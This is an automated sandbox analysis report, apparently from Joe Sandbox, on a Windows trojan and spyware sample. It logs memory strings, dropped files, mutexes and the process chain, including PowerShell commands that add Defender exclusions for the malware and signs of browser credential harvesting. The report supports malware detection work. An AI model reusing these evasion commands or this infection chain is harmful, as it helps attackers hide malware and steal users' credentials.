Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: powershell.exe, 0000000F.00000002.2189135680.0000016CE9D5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: BrokerhostNet.exe, 00000016.00000002.2239308433.000000000343F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3069927111.000000001E4E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 0000000E.00000002.2067060610.0000023880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2069904131.0000016CD1931000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000000E.00000002.2162276807.0000023890073000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.2162276807.0000023890073000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.2162276807.0000023890073000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000001C.00000003.2173548444.0000022F854E2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.28.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.28.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.28.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000001C.00000003.2173548444.0000022F854E2000.00000004.00000800.00020000.00000000.sdmp, edb.log.28.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 0000000F.00000002.2069904131.0000016CD1B58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.2162276807.0000023890073000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 0000001C.00000003.2173548444.0000022F854E2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.28.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: jy55Uj7NmZ.24.dr, mZeYGDQT2d.24.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

Code function: 0_2_00DC6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00DC6FAA

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DC848E	0_2_00DC848E
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DC40FE	0_2_00DC40FE
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DD4088	0_2_00DD4088
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DD00B7	0_2_00DD00B7
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DE51C9	0_2_00DE51C9
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DD7153	0_2_00DD7153
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DD62CA	0_2_00DD62CA
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DC32F7	0_2_00DC32F7
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DD43BF	0_2_00DD43BF
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DED440	0_2_00DED440
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DCF461	0_2_00DCF461
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DCC426	0_2_00DCC426
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DD77EF	0_2_00DD77EF
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DED8EE	0_2_00DED8EE
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DC286B	0_2_00DC286B
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DF19F4	0_2_00DF19F4
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DCE9B7	0_2_00DCE9B7
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DD6CDC	0_2_00DD6CDC
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DD3E0B	0_2_00DD3E0B
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DCEFE2	0_2_00DCEFE2
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DE4F9A	0_2_00DE4F9A
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 7_2_00007FFD9BAC0D4C	7_2_00007FFD9BAC0D4C
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 7_2_00007FFD9BAC0E43	7_2_00007FFD9BAC0E43
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 7_2_00007FFD9BECA1EE	7_2_00007FFD9BECA1EE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9BA953F2	14_2_00007FFD9BA953F2
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 22_2_00007FFD9BAC0D4C	22_2_00007FFD9BAC0D4C
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 22_2_00007FFD9BAC0E43	22_2_00007FFD9BAC0E43
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 22_2_00007FFD9BAD0000	22_2_00007FFD9BAD0000
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 22_2_00007FFD9BAF1045	22_2_00007FFD9BAF1045
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 22_2_00007FFD9BAFD271	22_2_00007FFD9BAFD271
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 23_2_00007FFD9BAB0D4C	23_2_00007FFD9BAB0D4C
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 23_2_00007FFD9BAB0E43	23_2_00007FFD9BAB0E43
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 24_2_00007FFD9BAB0000	24_2_00007FFD9BAB0000
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 24_2_00007FFD9BAA0D4C	24_2_00007FFD9BAA0D4C
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 24_2_00007FFD9BAA0E43	24_2_00007FFD9BAA0E43
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 24_2_00007FFD9BAD1045	24_2_00007FFD9BAD1045
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 24_2_00007FFD9BE9C32A	24_2_00007FFD9BE9C32A
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 24_2_00007FFD9BFC4DEC	24_2_00007FFD9BFC4DEC
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 24_2_00007FFD9BFC923D	24_2_00007FFD9BFC923D
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 25_2_00007FFD9BAD0D4C	25_2_00007FFD9BAD0D4C
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 25_2_00007FFD9BAD0E43	25_2_00007FFD9BAD0E43
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 27_2_00007FFD9BAA0D4C	27_2_00007FFD9BAA0D4C
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 27_2_00007FFD9BAA0E43	27_2_00007FFD9BAA0E43

Source: Joe Sandbox View	Dropped File: C:\Bridgecontainerserver\BrokerhostNet.exe A7883947A5F3C0D74F3EAC6C2A6DA45555298D769F5E3137E10A3ECE14E83DFD
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe A7883947A5F3C0D74F3EAC6C2A6DA45555298D769F5E3137E10A3ECE14E83DFD
Source: Joe Sandbox View	Dropped File: C:\Users\user\Desktop\BxbrKIuG.log DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: String function: 00DDF5F0 appears 31 times
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: String function: 00DDEC50 appears 56 times
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: String function: 00DDEB78 appears 39 times

Source: utIZHXKr.log.7.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: pXxtswpF.log.7.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: foddJTjY.log.7.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: WFKNZreq.log.7.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: NcCXpyPJ.log.7.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: gkcQYEdJSO.exe

Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs gkcQYEdJSO.exe

Source: gkcQYEdJSO.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: BrokerhostNet.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: utIZHXKr.log.7.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: pXxtswpF.log.7.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: foddJTjY.log.7.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: WFKNZreq.log.7.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: NcCXpyPJ.log.7.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.BrokerhostNet.exe.302ef40.6.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 7.2.BrokerhostNet.exe.2ed7ea0.15.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@30/47@1/2

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

Code function: 0_2_00DC6C74 GetLastError,FormatMessageW,

0_2_00DC6C74

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

Code function: 0_2_00DDA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00DDA6C2

Source: C:\Bridgecontainerserver\BrokerhostNet.exe

File created: C:\Users\user\Desktop\utIZHXKr.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-jYA8BnJN4l5GER9R0Xjc
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03

Source: C:\Bridgecontainerserver\BrokerhostNet.exe

File created: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Bridgecontainerserver\SlMo.bat" "

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Command line argument: sfxname	0_2_00DDDF1E
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Command line argument: sfxstime	0_2_00DDDF1E
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Command line argument: STARTDLG	0_2_00DDDF1E
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Command line argument: xz	0_2_00DDDF1E

Source: gkcQYEdJSO.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: gkcQYEdJSO.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Bridgecontainerserver\BrokerhostNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 8C0IwMCBVs.24.dr, trp9bDSdOf.24.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: gkcQYEdJSO.exe

ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

File read: C:\Users\user\Desktop\gkcQYEdJSO.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\gkcQYEdJSO.exe "C:\Users\user\Desktop\gkcQYEdJSO.exe"
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Bridgecontainerserver\VBxKsR3W5qREBSxxvIt5VpzoFdFFANtbsRk6NDfKSHeOxN7UsJds5Ck.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Bridgecontainerserver\SlMo.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Bridgecontainerserver\BrokerhostNet.exe "C:\Bridgecontainerserver/BrokerhostNet.exe"
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe'
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Bridgecontainerserver\BrokerhostNet.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qcUpJGnph9.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown	Process created: C:\Bridgecontainerserver\BrokerhostNet.exe C:\Bridgecontainerserver\BrokerhostNet.exe
Source: unknown	Process created: C:\Bridgecontainerserver\BrokerhostNet.exe C:\Bridgecontainerserver\BrokerhostNet.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe "C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Bridgecontainerserver\VBxKsR3W5qREBSxxvIt5VpzoFdFFANtbsRk6NDfKSHeOxN7UsJds5Ck.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Bridgecontainerserver\SlMo.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Bridgecontainerserver\BrokerhostNet.exe "C:\Bridgecontainerserver/BrokerhostNet.exe"	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe'	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Bridgecontainerserver\BrokerhostNet.exe'	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qcUpJGnph9.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe "C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe"

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Section loaded: srvcli.dll	Jump to behavior
